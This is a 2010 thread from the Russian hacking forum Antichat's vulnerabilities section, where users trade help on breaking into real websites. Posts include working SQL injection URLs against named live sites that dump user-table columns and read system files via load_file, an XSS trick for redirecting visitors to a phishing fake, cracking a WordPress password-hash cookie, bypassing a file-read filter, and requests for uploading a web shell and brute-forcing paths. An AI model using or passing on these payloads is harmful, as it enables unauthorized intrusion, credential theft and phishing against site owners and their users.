HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.03.2010, 19:22
total90
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
С нами: 8743576

Репутация: 241
По умолчанию

есть строчка такого рода:

Код:
wordpress_test_cookie=WP+Cookie+check;%20wordpressuser_4660020b7a87d7619827cd8098d2d654=Spider;%20wordpresspass_4660020b7a87d7619827cd8098d2d654=febc22cb6c4923d9271a857fc9ea2f7d

как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то?
 
Ответить с цитированием

  #2  
Старый 05.03.2010, 23:39
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Цитата:
Сообщение от total90  
есть строчка такого рода:

Код:
wordpress_test_cookie=WP+Cookie+check;%20wordpressuser_4660020b7a87d7619827cd8098d2d654=Spider;%20wordpresspass_4660020b7a87d7619827cd8098d2d654=febc22cb6c4923d9271a857fc9ea2f7d

как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то?
судя по всему куки от wp <2.5, там пароль хранится в wordpresspass алгоритмом md5(md5())
 
Ответить с цитированием

  #3  
Старый 06.03.2010, 06:19
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами: 8840513

Репутация: 0
По умолчанию

У меня имееться xss. Я сделал чтобы была автоматическая переадресация на мой фейк таким образом:
Код HTML:
style=background:url('//') onerror=document.write
Но это работает только в опере

Для ie & firefox я сделал чтобы при наведении на текст переадресовывало на фейк:
Код HTML:
onmouseover=document.write
Как сделать чтоб переадресация была автоматически в ie & firefox?
 
Ответить с цитированием

  #4  
Старый 05.03.2010, 19:24
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name% 29,3%20from%20information_schema.columns%20where%2 0table_name=0x75736572--
выдает id,name,email,pass,session_id,session_date,nick

Нашел Sql
Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу

В чем может быть косяк?
 
Ответить с цитированием

  #5  
Старый 05.03.2010, 19:52
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Цитата:
Сообщение от Assembler  
http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name% 29,3%20from%20information_schema.columns%20where%2 0table_name=0x75736572--
выдает id,name,email,pass,session_id,session_date,nick

Нашел Sql
Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу

В чем может быть косяк?

http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,count(*),3+from+user

Таблица пустая
 
Ответить с цитированием

  #6  
Старый 05.03.2010, 20:41
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Всем привет
можно ли это как нибудь обойти?
PHP код:
$kat htmlspecialchars($kat); 
$kat str_replace('.','',$kat); 
$kat str_replace('/','',$kat); 

if (
$_GET[file]) 

file("$kat/$file1");

 
Ответить с цитированием

  #7  
Старый 05.03.2010, 20:48
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

Цитата:
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,fi le_priv,3,4 ,5,6,7,8,9,10,11,12 +from+mysql.user
pojalusta pmoqite kak mojno zalivat shell ??
 
Ответить с цитированием

  #8  
Старый 05.03.2010, 20:57
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Код:
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('c:/boot.ini'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
искать абсолютные пути, брутить
 
Ответить с цитированием

  #9  
Старый 05.03.2010, 21:00
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

Pashkela , izvini a kak i qde brutit ??

kak moqu uznat drugie puti ??
 
Ответить с цитированием

  #10  
Старый 05.03.2010, 22:14
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.